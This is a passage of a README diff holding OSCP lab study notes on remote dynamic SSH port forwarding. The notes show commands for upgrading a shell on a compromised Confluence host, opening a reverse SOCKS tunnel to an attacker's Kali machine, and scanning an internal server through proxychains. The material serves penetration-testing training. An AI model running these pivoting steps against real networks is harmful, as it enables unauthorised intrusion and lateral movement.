xasyhack/offsec_oscp_2025/README.md

   - query data
     'SELECT * FROM payroll;'
 - SSH Tunneling (remote dynamic port forward)
+  - Remote dynamic port forwarding is just another instance of dynamic port forwarding, so we gain all the flexibility of traditional dynamic port forwarding.
+We can connect to any port on any host that CONFLUENCE01 has access to by passing SOCKS-formatted packets.
+  - we pass only one socket: the socket we want to listen on the SSH server
+  - Kali: 192.168.45.233, DB:10.4.133.215, MULTISERVER03: 192.168.133.64
+  - SSH with the remote dynamic port forward
+    ```
+    confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+    ssh -N -R 9998 kali@192.168.45.233
+    ```
+  - Edit proxychains config to point to new SOCKS proxy on port 9998
+    `nano /etc/proxychains4.conf` `socks5 127.0.0.1 9998`
+  - Scanning MULTISERVER03 through the remote dynamic SOCKS port with Proxychains > 80, 135, 3389
+    `proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.133.64` (change to internal server 10.4.xxx.64)
 - sshuttle
 ### 20. Tunneling through deep packet inspectation
 ### 21. The metassploit framework